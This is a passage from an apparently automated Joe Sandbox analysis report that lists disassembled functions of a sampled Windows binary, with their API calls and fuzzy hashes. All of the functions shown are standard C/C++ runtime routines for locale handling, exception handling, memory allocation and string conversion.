                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                          • String ID: csm$&p
                                                                                                          • API String ID: 1170836740-3788419405
                                                                                                          • Opcode ID: 5542e94aa8d3687ba5bfc5f75d09f1068c1327164bf11fe1c1326cb25d7d889c
                                                                                                          • Instruction ID: 6484ae11ec342fe46e494d6d2683005eccb35826cccdef04592887a4e345694d
                                                                                                          • Opcode Fuzzy Hash: 5542e94aa8d3687ba5bfc5f75d09f1068c1327164bf11fe1c1326cb25d7d889c
                                                                                                          • Instruction Fuzzy Hash: 0F41AD70E04218EBCF14DF6CC889A9E7BE1AF45324F148295E815AB3D2D739BE41CB91
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                                          • String ID:
                                                                                                          • API String ID: 127012223-0
                                                                                                          • Opcode ID: 44cc4e63951ec663596a546631ffb9d9f45007b06342a68d72b6d439bba88164
                                                                                                          • Instruction ID: 2f8b6bf06a7dea76fa2ed06346c766530a8623080a4c7ef1abe527ed89c99baf
                                                                                                          • Opcode Fuzzy Hash: 44cc4e63951ec663596a546631ffb9d9f45007b06342a68d72b6d439bba88164
                                                                                                          • Instruction Fuzzy Hash: 1F71F572900229BBDF319E54AC45FAF7BB6AF45310F294119EA04A7283D73DDD52C7A0
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00706AB0
                                                                                                          • __alloca_probe_16.LIBCMT ref: 00706ADC
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00706B1B
                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00706B38
                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00706B77
                                                                                                          • __alloca_probe_16.LIBCMT ref: 00706B94
                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00706BD6
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00706BF9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                          • String ID:
                                                                                                          • API String ID: 2040435927-0
                                                                                                          • Opcode ID: 5706e8b154793f9d6ca8109346a4f14049223ed8c1953ae69af0dff0f57d26af
                                                                                                          • Instruction ID: a0d46e9230562c487e826179e1ddf06f86b46ef8beae7c7ab85c514fd5a968e2
                                                                                                          • Opcode Fuzzy Hash: 5706e8b154793f9d6ca8109346a4f14049223ed8c1953ae69af0dff0f57d26af
                                                                                                          • Instruction Fuzzy Hash: F65190B250020AEFEB205F50CC55FAB7BE9EF44750F248628F955EA1D0D778AC618BA0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 3213747228-0
                                                                                                          • Opcode ID: c3ed0d376608a570b3b521b077c8efc077dfbec983f27d761b9b7f2e2db3b283
                                                                                                          • Instruction ID: e428fb38cc44767fad7039e36fb1b809c800f0721de5ff52456bd77e9110e37a
                                                                                                          • Opcode Fuzzy Hash: c3ed0d376608a570b3b521b077c8efc077dfbec983f27d761b9b7f2e2db3b283
                                                                                                          • Instruction Fuzzy Hash: 80B10672A00369EFDB258F6CCC85BEEBBA5FF55310F144155E914AB2C2D2789981C7A0
                                                                                                          APIs
                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00712945
                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 00712BBE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                                          • String ID: Tr$csm$csm$csm
                                                                                                          • API String ID: 2673424686-18262871
                                                                                                          • Opcode ID: 380788b8fbe3c3f286ed8c2bdb56ee03aa3ebad3f5cb84a0e26834746154df7d
                                                                                                          • Instruction ID: eca48d3f4a645abe113c00dc3003647efa5839deeeb30759baa53900c70dd756
                                                                                                          • Opcode Fuzzy Hash: 380788b8fbe3c3f286ed8c2bdb56ee03aa3ebad3f5cb84a0e26834746154df7d
                                                                                                          • Instruction Fuzzy Hash: 5BB17B71C04209EFCF28DFA8D8859EEB7B5FF14310F544159E9116B292D339EAA2CB91
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00705C93
                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,00705C5C,?,00000000,?,006FB93C,?,?,006FD94E), ref: 00705CB2
                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00705C5C,?,00000000,?,006FB93C,?,?,006FD94E), ref: 00705CE0
                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00705C5C,?,00000000,?,006FB93C,?,?,006FD94E), ref: 00705D3B
                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00705C5C,?,00000000,?,006FB93C,?,?,006FD94E), ref: 00705D52
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                          • String ID: \\p
                                                                                                          • API String ID: 66001078-3706482082
                                                                                                          • Opcode ID: 6f57efd4f6cada323379e5653bc7aa8ad6c8bce0b5c47181a1abf344d39763e3
                                                                                                          • Instruction ID: 07abec4964bef3fd459d550d4c52df96deb57fd0e384619217c57ad973e3cbd3
                                                                                                          • Opcode Fuzzy Hash: 6f57efd4f6cada323379e5653bc7aa8ad6c8bce0b5c47181a1abf344d39763e3
                                                                                                          • Instruction Fuzzy Hash: 89412935600B0ADBCB20DF65D4D89ABB7F5FF04310B508A2AD446D7690D738E985CF64
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 0070295D
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00702968
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 007029D6
                                                                                                            • Part of subcall function 0070285F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00702877
                                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 00702983
                                                                                                          • _Yarn.LIBCPMT ref: 00702999
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 1088826258-2011850372
                                                                                                          • Opcode ID: a095bf3942434431949f093274c2097c0c1303bd21cc13bb0e141b6049a10e4d
                                                                                                          • Instruction ID: a380cf9d3bf36d08520c7cd6ab2ddc23610bbccd432a872a7ea6fea13686284c
                                                                                                          • Opcode Fuzzy Hash: a095bf3942434431949f093274c2097c0c1303bd21cc13bb0e141b6049a10e4d
                                                                                                          • Instruction Fuzzy Hash: 4C015E76A00120DBDB06EB60D85A57D7BA1BF84350B188209E811673D2CF7C6E43CB95
                                                                                                          APIs
                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,48E58DFA,?,?,00000000,00723374,000000FF,?,0070CAFD,0070C9E4,?,0070CB99,00000000), ref: 0070CA71
                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0070CA83
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00723374,000000FF,?,0070CAFD,0070C9E4,?,0070CB99,00000000), ref: 0070CAA5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                          • String ID: CorExitProcess$mscoree.dll$&p
                                                                                                          • API String ID: 4061214504-39180574
                                                                                                          • Opcode ID: b99ec9209e3818365a68404b2ee92fa9fe8f0e207631b0a757efa442b15eccce
                                                                                                          • Instruction ID: c769dff73a3eb576c2e04d8809250ec3dacad102b9806732acee5ba92f5a3522
                                                                                                          • Opcode Fuzzy Hash: b99ec9209e3818365a68404b2ee92fa9fe8f0e207631b0a757efa442b15eccce
                                                                                                          • Instruction Fuzzy Hash: 9D016771A04669EFDB21DF54DC05BAEBBF8FB04B15F048625F815A22D0DB7CAD00CA94
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00706CC1
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00706CCF
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00706CE0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                          • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                          • API String ID: 667068680-1047828073
                                                                                                          • Opcode ID: 6089c07f586e2bd40d08079466cb428fd3d8557963d30549d3523d07fcb380b5
                                                                                                          • Instruction ID: 46e8a7c5a13696bcd68f1f9891c47a52cabd365738ed48d4872ef208ee4103c3
                                                                                                          • Opcode Fuzzy Hash: 6089c07f586e2bd40d08079466cb428fd3d8557963d30549d3523d07fcb380b5
                                                                                                          • Instruction Fuzzy Hash: 64D0A9B6582330AF93309FB0BC0CC863BA4EB143133518022F804C3260DABC28828F9A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: aaa0319f0589ac9f00698e72a5e8eb41a9feffe27011965ac385472c008538d7
                                                                                                          • Instruction ID: 8e0c2cba209c16a56be0be65b44620f3d5758836c2f1085d77ff53f65e46d2d9
                                                                                                          • Opcode Fuzzy Hash: aaa0319f0589ac9f00698e72a5e8eb41a9feffe27011965ac385472c008538d7
                                                                                                          • Instruction Fuzzy Hash: 82B1D1B0A44289EBDB12DFDCD845BED7BB0BF49300F148258E411A72D2C77C9982CB55
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(?,?,00711FA5,00707361,00706681), ref: 00711FBC
                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00711FCA
                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00711FE3
                                                                                                          • SetLastError.KERNEL32(00000000,00711FA5,00707361,00706681), ref: 00712035
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3852720340-0
                                                                                                          • Opcode ID: 30ccbd51a750eccbc939057450176c1b04d262b28a3ae376ed1d7be9c49d8926
                                                                                                          • Instruction ID: 35b35f485d9cfd9f04e3b26c336a7bdfff731753dc4386dc350a4e11e51f25fa
                                                                                                          • Opcode Fuzzy Hash: 30ccbd51a750eccbc939057450176c1b04d262b28a3ae376ed1d7be9c49d8926
                                                                                                          • Instruction Fuzzy Hash: C701283620A2119DB7382A7E7C899A62644DB55775B210729F520480F2EF9E5C82D5D4
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustPointer
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 1740715915-2011850372
                                                                                                          • Opcode ID: 3d83ba3ff7ac4a86f2665dedd3c7b029559834f5a05574e09584424443f965e2
                                                                                                          • Instruction ID: 4d6bfdd26f00d12ae072f71b959521f204f1f0db1df145343c45bb518a121679
                                                                                                          • Opcode Fuzzy Hash: 3d83ba3ff7ac4a86f2665dedd3c7b029559834f5a05574e09584424443f965e2
                                                                                                          • Instruction Fuzzy Hash: 5B51E372A00602DFDB298F18D845BFA73A5FF44710F154529E801476D2EB39ECE2CB90
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 007043A0
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 007043AA
                                                                                                            • Part of subcall function 006F4D90: std::_Lockit::_Lockit.LIBCPMT ref: 006F4DBE
                                                                                                            • Part of subcall function 006F4D90: std::_Lockit::~_Lockit.LIBCPMT ref: 006F4DE9
                                                                                                          • codecvt.LIBCPMT ref: 007043E4
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0070441B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 3716348337-2011850372
                                                                                                          • Opcode ID: 506d8cb0db9a3463f029d912b9310726df4b4734a9783c3ec21b66c43e43a34c
                                                                                                          • Instruction ID: 93ea3c62fded4d867549748a38f1da0faa229706059481cc5a68a9f407c995ad
                                                                                                          • Opcode Fuzzy Hash: 506d8cb0db9a3463f029d912b9310726df4b4734a9783c3ec21b66c43e43a34c
                                                                                                          • Instruction Fuzzy Hash: A301C076900119DBCB01EB64D819ABEB7F1AF80321F648618F5106B3D2CF7C9E018B90
                                                                                                          APIs
                                                                                                          • __alloca_probe_16.LIBCMT ref: 00714952
                                                                                                          • __alloca_probe_16.LIBCMT ref: 00714A1B
                                                                                                          • __freea.LIBCMT ref: 00714A82
                                                                                                            • Part of subcall function 007131C1: RtlAllocateHeap.NTDLL(00000000,?,?,?,007022A9,?,?,006F3E32,00001000,?,006F3D7A), ref: 007131F3
                                                                                                          • __freea.LIBCMT ref: 00714A95
                                                                                                          • __freea.LIBCMT ref: 00714AA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1423051803-0
                                                                                                          • Opcode ID: 13ae87e94062c5330d3002476cf43e5fdce02e5a1da53fafa477f8a346578bb8
                                                                                                          • Instruction ID: dc6f428a1407f869924c76d887941a0fffe494381cb7feafe55b17fcb3dfdda6
                                                                                                          • Opcode Fuzzy Hash: 13ae87e94062c5330d3002476cf43e5fdce02e5a1da53fafa477f8a346578bb8
                                                                                                          • Instruction Fuzzy Hash: 0A51A372640206BFEF209F68CC85EFB7BADEF84710B1A8529FD04D61C1E638DD908664
                                                                                                          APIs
                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0071272D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
